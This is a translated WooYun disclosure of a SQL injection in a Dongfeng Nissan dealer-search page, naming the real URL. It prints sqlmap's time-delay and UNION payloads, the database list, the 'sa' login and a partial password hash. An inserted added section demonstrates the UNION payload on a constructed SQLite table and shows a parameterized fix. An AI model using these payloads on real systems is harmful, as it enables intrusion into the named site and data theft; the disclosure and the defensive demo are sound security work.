
Vulnerability summary

Defect ID: wooyun-2015-0134035

Title: SQL injection in a Dongfeng Nissan sub-site (sa privileges)

Vendor: Dongfeng Nissan Passenger Vehicle Company

Author: 日出东方

Submitted: 2015-08-14 09:15

Fixed: 2015-08-14 09:53

Published: 2015-08-14 09:53

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-08-14: details sent to the vendor, awaiting vendor action
2015-08-14: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

As titled.
Not sure whether this is a duplicate.
Bug hunting isn't easy for a newbie.

Detailed description:

http://www.dfcv.com.cn/Service.aspx
POST injection in the 4S dealer lookup.
Parameter: ctl00%24MainContent%24txtDealerName
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ctl00$MainContent$txtDealerName (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=/wEPDwULLTExOTg5MjA2OTgPZBYCZg9kFgICAw9kFgJmD2QWCAIBD2QWCgIBDxYCHgVjbGFzc2VkAgMPFgIfAGVkAgUPFgIfAAUFaG92ZXJkAgcPFgIfAGVkAgkPFgIfAGVkAgMPEA8WBh4NRGF0YVRleHRGaWVsZAUMUHJvdmluY2VOYW1lHg5EYXRhVmFsdWVGaWVsZAUKUHJvdmluY2VJRB4LXyFEYXRhQm91bmRnZBAVJA/or7fpgInmi6nnnIHku70J5YyX5Lqs5biCCeWkqea0peW4ggnmsrPljJfnnIEJ5bGx6KW/55yBCeWGheiSmeWMugnovr3lroHnnIEJ5ZCJ5p6X55yBDOm7kem+meaxn+ecgQnkuIrmtbfluIIJ5rGf6IuP55yBCeWuieW+veecgQnmtZnmsZ/nnIEJ56aP5bu655yBCeaxn+ilv+ecgQnlsbHkuJznnIEJ5rKz5Y2X55yBCea5luWMl+ecgQnmuZbljZfnnIEJ5bm/5Lic55yBCeW5v+ilv+WMugnmtbfljZfnnIEJ5Zub5bed55yBCeS6keWNl+ecgQnotLXlt57nnIEJ6KW/6JeP5Yy6CemZleilv+ecgQnnlJjogoPnnIEJ6Z2S5rW355yBCeWugeWkj+WMugnmlrDnlobljLoJ6YeN5bqG5biCBummmea4rwbmvrPpl6gG5Y+w5rm+BuWbveWklhUkAAExATIBMwE0ATUBNgE3ATgBOQIxMAIxMQIxMgIxMwIxNAIxNQIxNgIxNwIxOAIxOQIyMAIyMQIyMgIyMwIyNAIyNQIyNgIyNwIyOAIyOQIzMAIzMQIzMgIzMwIzNAIzNRQrAyRnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dkZAIJDxYCHgtfIUl0ZW1Db3VudGZkAgsPDxYCHgtSZWNvcmRjb3VudGZkZGSO28Yzywapkf574ZbtaeGXGzhhYmG3nF1YmxMhOQrJKg==&__EVENTVALIDATION=/wEWJwLBkabeBwL445+1BwL3jLXbCwL2jLXbCwL1jLXbCwL0jLXbCwLzjLXbCwLyjLXbCwLxjLXbCwLgjLXbCwLvjLXbCwL3jPXYCwL3jPnYCwL3jP3YCwL3jMHYCwL3jMXYCwL3jMnYCwL3jM3YCwL3jNHYCwL3jJXbCwL3jJnbCwL2jPXYCwL2jPnYCwL2jP3YCwL2jMHYCwL2jMXYCwL2jMnYCwL2jM3YCwL2jNHYCwL2jJXbCwL2jJnbCwL1jPXYCwL1jPnYCwL1jP3YCwL1jMHYCwL1jMXYCwL1jMnYCwKMkfXVCAKjkJHZAqiugOxWThMVC+5R6g080+Hhc51nJm9KnzY585p+nI1R&ctl00$MainContent$ddlProvince=&ctl00$MainContent$txtDealerName=a';WAITFOR DELAY '0:0:5'--&ctl00$MainContent$btnSearch=
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: __VIEWSTATE=/wEPDwULLTExOTg5MjA2OTgPZBYCZg9kFgICAw9kFgJmD2QWCAIBD2QWCgIBDxYCHgVjbGFzc2VkAgMPFgIfAGVkAgUPFgIfAAUFaG92ZXJkAgcPFgIfAGVkAgkPFgIfAGVkAgMPEA8WBh4NRGF0YVRleHRGaWVsZAUMUHJvdmluY2VOYW1lHg5EYXRhVmFsdWVGaWVsZAUKUHJvdmluY2VJRB4LXyFEYXRhQm91bmRnZBAVJA/or7fpgInmi6nnnIHku70J5YyX5Lqs5biCCeWkqea0peW4ggnmsrPljJfnnIEJ5bGx6KW/55yBCeWGheiSmeWMugnovr3lroHnnIEJ5ZCJ5p6X55yBDOm7kem+meaxn+ecgQnkuIrmtbfluIIJ5rGf6IuP55yBCeWuieW+veecgQnmtZnmsZ/nnIEJ56aP5bu655yBCeaxn+ilv+ecgQnlsbHkuJznnIEJ5rKz5Y2X55yBCea5luWMl+ecgQnmuZbljZfnnIEJ5bm/5Lic55yBCeW5v+ilv+WMugnmtbfljZfnnIEJ5Zub5bed55yBCeS6keWNl+ecgQnotLXlt57nnIEJ6KW/6JeP5Yy6CemZleilv+ecgQnnlJjogoPnnIEJ6Z2S5rW355yBCeWugeWkj+WMugnmlrDnlobljLoJ6YeN5bqG5biCBummmea4rwbmvrPpl6gG5Y+w5rm+BuWbveWklhUkAAExATIBMwE0ATUBNgE3ATgBOQIxMAIxMQIxMgIxMwIxNAIxNQIxNgIxNwIxOAIxOQIyMAIyMQIyMgIyMwIyNAIyNQIyNgIyNwIyOAIyOQIzMAIzMQIzMgIzMwIzNAIzNRQrAyRnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dkZAIJDxYCHgtfIUl0ZW1Db3VudGZkAgsPDxYCHgtSZWNvcmRjb3VudGZkZGSO28Yzywapkf574ZbtaeGXGzhhYmG3nF1YmxMhOQrJKg==&__EVENTVALIDATION=/wEWJwLBkabeBwL445+1BwL3jLXbCwL2jLXbCwL1jLXbCwL0jLXbCwLzjLXbCwLyjLXbCwLxjLXbCwLgjLXbCwLvjLXbCwL3jPXYCwL3jPnYCwL3jP3YCwL3jMHYCwL3jMXYCwL3jMnYCwL3jM3YCwL3jNHYCwL3jJXbCwL3jJnbCwL2jPXYCwL2jPnYCwL2jP3YCwL2jMHYCwL2jMXYCwL2jMnYCwL2jM3YCwL2jNHYCwL2jJXbCwL2jJnbCwL1jPXYCwL1jPnYCwL1jP3YCwL1jMHYCwL1jMXYCwL1jMnYCwKMkfXVCAKjkJHZAqiugOxWThMVC+5R6g080+Hhc51nJm9KnzY585p+nI1R&ctl00$MainContent$ddlProvince=&ctl00$MainContent$txtDealerName=a' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(83)+CHAR(108)+CHAR(65)+CHAR(68)+CHAR(110)+CHAR(106)+CHAR(85)+CHAR(82)+CHAR(98)+CHAR(76)+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &ctl00$MainContent$btnSearch=
---
[08:57:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
7 databases
available databases [7]:
[*] CVWeb
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
current user: 'sa'
password hash: 0x0100620e9c8157e54f7a50db7374f1--5c7aef6095f89561f842
I didn't try whether commands can be executed; I was only finding the bug.
over++
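The UNION technique in the sqlmap output above, reproduced offline against a constructed SQLite table, next to the parameterized query that closes the hole. This is an added example, not code from the report or from the site: the table name `dealers`, its 17-column layout, the `dealer_name` column and the sample rows are assumptions, and SQLite stands in for the SQL Server backend, so the `CHAR()` chain sqlmap used to avoid quotes is replaced by a quoted literal (SQL Server joins `CHAR()` with `+`, SQLite with `||`).

```python
"""Added example, not from the WooYun report: reproduces the UNION-based
injection sqlmap reported on ctl00$MainContent$txtDealerName against an
in-memory SQLite table, and shows the parameterized query that fixes it.
Table name, column layout and sample rows are constructed for the demo;
the real CVWeb schema is not known from the report."""
import sqlite3

# 17 columns, matching sqlmap's "Generic UNION query (NULL) - 17 columns".
NUM_COLUMNS = 17
COLUMNS = [f"c{i}" for i in range(NUM_COLUMNS)]
COLUMNS[1] = "dealer_name"  # hypothetical name of the searched column

# In the report's payload the marker sits in column 8 (index 7).
MARKER_POSITION = 7


def build_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the 4S dealer table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        f"CREATE TABLE dealers ({', '.join(c + ' TEXT' for c in COLUMNS)})"
    )
    for i in range(3):
        row = [f"v{i}_{j}" for j in range(NUM_COLUMNS)]
        row[1] = f"Dealer {i}"
        conn.execute(
            f"INSERT INTO dealers VALUES ({','.join('?' * NUM_COLUMNS)})", row
        )
    return conn


def search_vulnerable(conn: sqlite3.Connection, dealer_name: str) -> list:
    """String concatenation: the pattern behind the reported finding."""
    sql = f"SELECT * FROM dealers WHERE dealer_name LIKE '%{dealer_name}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn: sqlite3.Connection, dealer_name: str) -> list:
    """Parameterized query: the input is bound as data, never parsed as SQL."""
    sql = "SELECT * FROM dealers WHERE dealer_name LIKE '%' || ? || '%'"
    return conn.execute(sql, (dealer_name,)).fetchall()


def union_payload(marker: str, position: int = MARKER_POSITION) -> str:
    """sqlmap-style UNION payload: NULL in every column except one that
    carries a recognisable marker, '--' commenting out the trailing %'."""
    cols = ["NULL"] * NUM_COLUMNS
    cols[position] = f"'{marker}'"
    return "a' UNION ALL SELECT " + ",".join(cols) + "-- "


def marker_leaked(rows: list, marker: str, position: int = MARKER_POSITION) -> bool:
    """True if any returned row carries the marker, i.e. the UNION ran."""
    return any(r[position] == marker for r in rows)


if __name__ == "__main__":
    db = build_db()
    # Same marker sqlmap sent, decoded from its CHAR() chain.
    marker = "qzqjqSlADnjURbLqbxvq"
    print("vulnerable:", marker_leaked(search_vulnerable(db, union_payload(marker)), marker))
    print("parameterized:", marker_leaked(search_safe(db, union_payload(marker)), marker))
```

The stacked-queries vector (`a';WAITFOR DELAY '0:0:5'--`) is SQL Server specific and is not reproduced here, but the parameterized form closes it for the same reason: the text box content is never parsed as SQL. Separately from the query fix, the sqlmap output shows the application connecting as `sa` with master, msdb and the ReportServer databases reachable; a dedicated login restricted to CVWeb would confine what any remaining injection could reach.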

Proof of vulnerability:

As above.

Fix:

121

Copyright notice: please credit the source when reposting: 日出东方@乌云


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-08-14 09:53

Vendor reply:

Thanks for the heads-up! But this site is not within our company's business scope.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-08-14 10:03 | 日出东方 ( Regular white hat | Rank:161 Vulns:20 )

    Bro, they're all the same group.

  2. 2015-08-18 18:35 | ShAdow丶 ( Intern white hat | Rank:76 Vulns:9 | i am a fan of kimYeWon.)

    @日出东方 After seeing the rank this vendor gives out, I have no desire to dig any more.